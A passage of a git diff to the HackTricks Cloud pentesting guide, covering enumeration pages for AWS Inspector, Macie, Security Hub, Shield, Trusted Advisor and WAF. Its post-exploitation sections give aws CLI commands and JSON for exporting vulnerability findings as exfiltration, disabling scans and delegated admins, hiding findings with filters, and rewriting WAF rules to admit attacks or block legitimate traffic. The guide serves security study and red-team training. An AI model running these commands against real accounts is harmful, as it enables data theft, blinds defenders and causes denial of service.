library like python-jwt with a known vulnerability, it generates a finding. -* **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues. +- **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding. +- **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues. #### **Center for Internet Security (CIS) scans** Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines. -* **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title. -* **Execution**: Scans are performed or scheduled based on instance tags and defined schedules. -* **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance. +- **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title. +- **Execution**: Scans are performed or scheduled based on instance tags and defined schedules. +- **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance. ### Enumeration @@ -199,11 +186,10 @@ aws inspector list-rules-packages ### Post Exploitation -{% hint style="success" %} -From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers. - -However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones). -{% endhint %} +> [!TIP] +> From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers. +> +> However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones). #### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport` @@ -222,30 +208,26 @@ The following example shows how to exfiltrate all the Active findings from Amazo ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "allow-inspector", - "Effect": "Allow", - "Principal": { - "Service": "inspector2.amazonaws.com" - }, - "Action": [ - "s3:PutObject", - "s3:PutObjectAcl", - "s3:AbortMultipartUpload" - ], - "Resource": "arn:aws:s3:::inspector-findings/*", - "Condition": { - "StringEquals": { - "aws:SourceAccount": "" - }, - "ArnLike": { - "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" - } - } - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "allow-inspector", + "Effect": "Allow", + "Principal": { + "Service": "inspector2.amazonaws.com" + }, + "Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"], + "Resource": "arn:aws:s3:::inspector-findings/*", + "Condition": { + "StringEquals": { + "aws:SourceAccount": "" + }, + "ArnLike": { + "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" + } + } + } + ] } ``` @@ -289,7 +271,7 @@ The following example shows how to exfiltrate all the Active findings from Amazo aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f ``` -* **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses. +- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses. #### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport` @@ -302,7 +284,7 @@ aws inspector2 cancel-findings-report --report-id aws inspector2 cancel-sbom-export --report-id ``` -* **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues. +- **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues. #### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter` @@ -317,20 +299,19 @@ aws inspector2 update-filter --filter-arn [--action ] [ aws inspector2 delete-filter --arn ``` -* **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings. +- **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings. #### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`) An attacker could significantly disrupt the security management structure. -* Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports. -* Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities. +- Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports. +- Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities. -{% hint style="warning" %} -It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator. - -In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** -{% endhint %} +> [!WARNING] +> It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator. +> +> In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** ```bash # Disable @@ -339,15 +320,14 @@ aws inspector2 disable-delegated-admin-account --delegated-admin-account-id ``` -* **Potential Impact**: Disruption of the security management. +- **Potential Impact**: Disruption of the security management. #### `inspector2:AssociateMember`, `inspector2:DisassociateMember` An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection. -{% hint style="warning" %} -This action requires to be performed by the delegated administrator. -{% endhint %} +> [!WARNING] +> This action requires to be performed by the delegated administrator. ```bash # Associate @@ -356,15 +336,14 @@ aws inspector2 associate-member --account-id aws inspector2 disassociate-member --account-id ``` -* **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities. +- **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities. #### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`) An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations. -{% hint style="warning" %} -This action requires to be performed by the delegated administrator. -{% endhint %} +> [!WARNING] +> This action requires to be performed by the delegated administrator. ```bash # Disable @@ -373,21 +352,20 @@ aws inspector2 disable --account-ids [--resource-types <{EC2, ECR, LAMBD aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids ] ``` -* **Potential Impact**: Creation of blind spots in the security monitoring. +- **Potential Impact**: Creation of blind spots in the security monitoring. #### `inspector2:UpdateOrganizationConfiguration` An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts. -{% hint style="warning" %} -This action requires to be performed by the delegated administrator. -{% endhint %} +> [!WARNING] +> This action requires to be performed by the delegated administrator. ```bash aws inspector2 update-organization-configuration --auto-enable ``` -* **Potential Impact**: Alter security scan policies and configurations for the organization. +- **Potential Impact**: Alter security scan policies and configurations for the organization. #### `inspector2:TagResource`, `inspector2:UntagResource` @@ -398,24 +376,11 @@ aws inspector2 tag-resource --resource-arn --tags aws inspector2 untag-resource --resource-arn --tag-keys ``` -* **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation. +- **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation. ## References -* [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html) -* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html) +- [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html) +- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md new file mode 100644 index 000000000..a4a26e683 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md @@ -0,0 +1,118 @@ +# AWS - Macie Enum + +## AWS - Macie Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Macie + +Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns. + +Key Features of Amazon Macie: + +1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account. +2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks. +3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time. +4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings. +5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks. + +Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality. + +### Alert System + +Macie categorizes alerts into predefined categories like: + +- Anonymized access +- Data compliance +- Credential Loss +- Privilege escalation +- Ransomware +- Suspicious access, etc. + +These alerts provide detailed descriptions and result breakdowns for effective response and resolution. + +### Dashboard Features + +The dashboard categorizes data into various sections, including: + +- S3 Objects (by time range, ACL, PII) +- High-risk CloudTrail events/users +- Activity Locations +- CloudTrail user identity types, and more. + +### User Categorization + +Users are classified into tiers based on the risk level of their API calls: + +- **Platinum**: High-risk API calls, often with admin privileges. +- **Gold**: Infrastructure-related API calls. +- **Silver**: Medium-risk API calls. +- **Bronze**: Low-risk API calls. + +### Identity Types + +Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. + +### Data Classification + +Data classification encompasses: + +- Content-Type: Based on detected content type. +- File Extension: Based on file extension. +- Theme: Categorized by keywords within files. +- Regex: Categorized based on specific regex patterns. + +The highest risk among these categories determines the file's final risk level. + +### Research and Analysis + +Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. + +### Enumeration + +``` +# Get buckets +aws macie2 describe-buckets + +# Org config +aws macie2 describe-organization-configuration + +# Get admin account (if any) +aws macie2 get-administrator-account +aws macie2 list-organization-admin-accounts # Run from the management account of the org + +# Get macie account members (run this form the admin account) +aws macie2 list-members + +# Check if automated sensitive data discovey is enabled +aws macie2 get-automated-discovery-configuration + +# Get findings +aws macie2 list-findings +aws macie2 get-findings --finding-ids +aws macie2 list-findings-filters +aws macie2 get -findings-filters --id + +# Get allow lists +aws macie2 list-allow-lists +aws macie2 get-allow-list --id + +# Get different info +aws macie2 list-classification-jobs +aws macie2 list-classification-scopes +aws macie2 list-custom-data-identifiers +``` + +#### Post Exploitation + +> [!TIP] +> From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ +> However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. + +TODO: PRs are welcome! + +## References + +- [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md new file mode 100644 index 000000000..3597a5297 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md @@ -0,0 +1,63 @@ +# AWS - Security Hub Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Security Hub + +**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. + +It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts + +**Characteristics** + +- Regional (findings don't cross regions) +- Multi-account support +- Findings from: + - Guard Duty + - Config + - Inspector + - Macie + - third party + - self-generated against CIS standards + +## Enumeration + +``` +# Get basic info +aws securityhub describe-hub + +# Get securityhub org config +aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error + +# Get the configured admin for securityhub +aws securityhub get-administrator-account +aws securityhub get-master-account # Another way +aws securityhub list-organization-admin-accounts # Another way + +# Get enabled standards +aws securityhub get-enabled-standards + +# Get the findings +aws securityhub get-findings + +# Get insights +aws securityhub get-insights + +# Get Automation rules (must be from the admin account) +aws securityhub list-automation-rules + +# Get members (must be from the admin account) +aws securityhub list-members +aws securityhub get-members --account-ids +``` + +## Bypass Detection + +TODO, PRs accepted + +## References + +- [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) +- [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md new file mode 100644 index 000000000..073fcb091 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md @@ -0,0 +1,15 @@ +# AWS - Shield Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Shield + +AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. + +**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. + +**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. + +Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md new file mode 100644 index 000000000..5ea8a625d --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md @@ -0,0 +1,71 @@ +# AWS - Trusted Advisor Enum + +## AWS - Trusted Advisor Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## AWS Trusted Advisor Overview + +Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: + +1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. +2. **Performance:** Identifies potential performance bottlenecks. +3. **Security:** Scans for vulnerabilities or weak security configurations. +4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. + +The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. + +### Notifications and Data Refresh + +- Trusted Advisor can issue alerts. +- Items can be excluded from its checks. +- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. + +### **Checks Breakdown** + +#### CategoriesCore + +1. Cost Optimization +2. Security +3. Fault Tolerance +4. Performance +5. Service Limits +6. S3 Bucket Permissions + +#### Core Checks + +Limited to users without business or enterprise support plans: + +1. Security Groups - Specific Ports Unrestricted +2. IAM Use +3. MFA on Root Account +4. EBS Public Snapshots +5. RDS Public Snapshots +6. Service Limits + +#### Security Checks + +A list of checks primarily focusing on identifying and rectifying security threats: + +- Security group settings for high-risk ports +- Security group unrestricted access +- Open write/list access to S3 buckets +- MFA enabled on root account +- RDS security group permissiveness +- CloudTrail usage +- SPF records for Route 53 MX records +- HTTPS configuration on ELBs +- Security groups for ELBs +- Certificate checks for CloudFront +- IAM access key rotation (90 days) +- Exposure of access keys (e.g., on GitHub) +- Public visibility of EBS or RDS snapshots +- Weak or absent IAM password policies + +AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. + +## **References** + +- [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md similarity index 73% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index 67086a993..8ca8a6a3b 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md @@ -2,20 +2,7 @@ ## AWS - WAF Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## AWS WAF @@ -60,7 +47,7 @@ A Lock Token is used for concurrency control when making updates to WAF resource API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations. -* **Example**: Integration of the CAPTCHA API. +- **Example**: Integration of the CAPTCHA API. #### Permission Policy @@ -70,8 +57,8 @@ A Permission Policy is an IAM policy that specifies who can perform actions on A The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution. -* **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located. -* **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served. +- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located. +- **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served. ### Key features @@ -81,19 +68,19 @@ The scope parameter in AWS WAF specifies whether the WAF rules and configuration Each AWS account can configure: -* **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). -* **100 rules** and **50 Web ACLs**. -* A maximum of **5 rate-based rules**. -* A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. +- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). +- **100 rules** and **50 Web ACLs**. +- A maximum of **5 rate-based rules**. +- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. #### Rule actions Actions are assigned to each rule, with options being: -* **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. -* **Block**: The request is terminated immediately. -* **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. -* **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges. +- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. +- **Block**: The request is terminated immediately. +- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. +- **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges. If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence: @@ -109,12 +96,12 @@ AWS WAF integrates with CloudWatch for monitoring, offering metrics like Allowed In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia): -* CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` . -* API and SDKs - For all calls, use the Region endpoint us-east-1. +- CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` . +- API and SDKs - For all calls, use the Region endpoint us-east-1. In order to interact with regional services, you should specify the region: -* Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2` +- Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2` ```bash # Web ACLs # @@ -128,7 +115,7 @@ aws wafv2 get-web-acl --name --id --scope # Additional permissions needed depending on the protected resource type: cognito-idp:ListResourcesForWebACL, ec2:DescribeVerifiedAccessInstanceWebAclAssociations or apprunner:ListAssociatedServicesForWebAcl ## Retrieve the Web ACL associated with the specified AWS resource aws wafv2 get-web-acl-for-resource --resource-arn # Additional permissions needed depending on the protected resource type: cognito-idp:GetWebACLForResource, ec2:GetVerifiedAccessInstanceWebAcl, wafv2:GetWebACL or apprunner:DescribeWebAclForService - + # Rule groups # ## List of the rule groups available in your AWS account @@ -179,7 +166,7 @@ aws wafv2 get-decrypted-api-key --scope | CLOUDFRONT ## List of logging configurations (storage location of the logs) aws wafv2 list-logging-configurations --scope | CLOUDFRONT --region=us-east-1> [--log-scope ] -## Retrieve the logging configuration settings associated with a specific web ACL +## Retrieve the logging configuration settings associated with a specific web ACL aws wafv2 get-logging-configuration --resource-arn [--log-scope ] [--log-type ] # Miscelaneous # @@ -188,7 +175,7 @@ aws wafv2 get-logging-configuration --resource-arn [--log-scope ## Retrieve a sample of web requests that match a specified rule within a WebACL during a specified time range -aws wafv2 get-sampled-requests --web-acl-arn --rule-metric-name --time-window --max-items <1-500> --scope +aws wafv2 get-sampled-requests --web-acl-arn --rule-metric-name --time-window --max-items <1-500> --scope ## Obtains the web ACL capacity unit (WCU) requirements for a specified scope and ruleset aws wafv2 check-capacity --scope | CLOUDFRONT --region=us-east-1> --rules @@ -202,11 +189,10 @@ aws wafv2 get-mobile-sdk-release --platform --release-version ### Post Exploitation / Bypass -{% hint style="success" %} -From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs. - -However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF. -{% endhint %} +> [!TIP] +> From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs. +> +> However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF. In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource. @@ -214,9 +200,9 @@ In many of the Delete and Update operations it would be necessary to provide the An attacker would be able to compromise the security of the affected resource by: -* Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service. -* Updating rule groups, being able to modify its actions for example from **Block** to **Allow**. -* Deleting rule groups that provide critical security measures. +- Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service. +- Updating rule groups, being able to modify its actions for example from **Block** to **Allow**. +- Deleting rule groups that provide critical security measures. ```bash # Create Rule Group @@ -239,23 +225,23 @@ The **rule.json** file would look like: ```json [ - { - "Name":"BlockLegitimateIPsRule", - "Priority":0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action":{ - "Block":{} - }, - "VisibilityConfig":{ - "SampledRequestsEnabled":false, - "CloudWatchMetricsEnabled":false, - "MetricName":"BlockLegitimateIPsRule" - } + { + "Name": "BlockLegitimateIPsRule", + "Priority": 0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action": { + "Block": {} + }, + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "BlockLegitimateIPsRule" } + } ] ``` @@ -265,13 +251,12 @@ The **rule.json** file would look like: With these permissions, an attacker would be able to: -* Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service. -* Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests. -* Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks. +- Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service. +- Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests. +- Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks. -{% hint style="info" %} -You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false. -{% endhint %} +> [!NOTE] +> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false. ```bash # Create Web ACL @@ -290,45 +275,44 @@ The following examples shows how to update a Web ACL to block the legitimate tra ```json { - "WebACL": { - "Name": "AllowLegitimateIPsWebACL", - "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "DefaultAction": { - "Allow": {} - }, - "Description": "", - "Rules": [ - { - "Name": "AllowLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Allow": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsRule" - } - } - ], - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsWebACL" - }, - "Capacity": 1, - "ManagedByFirewallManager": false, - "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" + "WebACL": { + "Name": "AllowLegitimateIPsWebACL", + "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", + "ARN": 